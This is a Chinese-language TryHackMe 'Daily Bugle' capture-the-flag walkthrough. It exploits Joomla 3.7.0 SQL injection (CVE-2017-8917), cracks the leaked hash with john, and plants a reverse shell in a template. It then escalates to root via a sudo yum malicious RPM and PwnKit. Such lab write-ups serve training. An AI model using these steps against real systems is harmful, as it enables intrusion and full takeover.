TryHackMe-进攻性渗透测试-06_Daily_Bugle
东郭骁
Daily Bugle
通过SQLi破坏Joomla CMS帐户,练习破解哈希并通过利用yum提升您的权限
循例,nmap 扫
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
在web兜兜转转一番后,能力有限,找不到比较有用的信息
只好通过借助metasploit
msf6 auxiliary(scanner/http/joomla_version) > run [*] Server: Apache/2.4.6 (CentOS) PHP/5.6.40 [+] Joomla version: 3.7.0
得知joomla的版本好是3.7.0
CVE-2017-8917
了解了一下这个exp,其实就是存在报错注入并进一步的利用
Jonah:$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm
john爆破
┌──(rootkali)-[/home/sugobet]
└─# echo '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > ./hash
┌──(rootkali)-[/home/sugobet]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
爆了近十分钟,爆出来了
spiderman123
访问/administrator并登录
找了一会,这里可以修改页面php内容,我们将其修改成reverse shell
/administrator/index.php?option=com_templates&view=template
成功getshell
Ncat: Connection from 10.10.232.38. Ncat: Connection from 10.10.232.38:55966. bash: no job control in this shell bash-4.2$ whoami whoami apache
升级shell,目标主机没有python3,所以用python2
python -c "import pty;pty.spawn('/bin/bash')"
cat ./configuration.php
这个文件包含了数据库的密码等,这个密码也是jjameson的用户密码
我们可以直接ssh登录
┌──(rootkali)-[/home/sugobet] └─# ssh jjameson@10.10.232.38
sudo -l 发现可以使用yum
我们翻看垃圾桶,然后构造
gem install fpm
apt install rpm
┌──(rootkali)-[/home/sugobet] └─# TF=$(mktemp -d) ┌──(rootkali)-[/home/sugobet] └─# echo 'cp /bin/bash /tmp/cmd;chmod +s /tmp/cmd' > $TF/x.sh
┌──(rootkali)-[/home/sugobet]
└─# fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
Created package {:path=>"x-1.0-1.noarch.rpm"}
将文件上传到目标:
scp ./x-1.0-1.noarch.rpm jjameson@10.10.232.38:/home/jjameson
目标上安装:
[jjameson@dailybugle ~]$ sudo yum localinstall -y x-1.0-1.noarch.rpm
jjameson@dailybugle ~]$ /tmp/cmd -p cmd-4.2# whoami root
成功getroot
提权方法二:
通杀的cve
pwnkit CVE-2021-4034,pkexec利用
[jjameson@dailybugle ~]$ ./PwnKit [root@dailybugle jjameson]# whoami root
类似资料: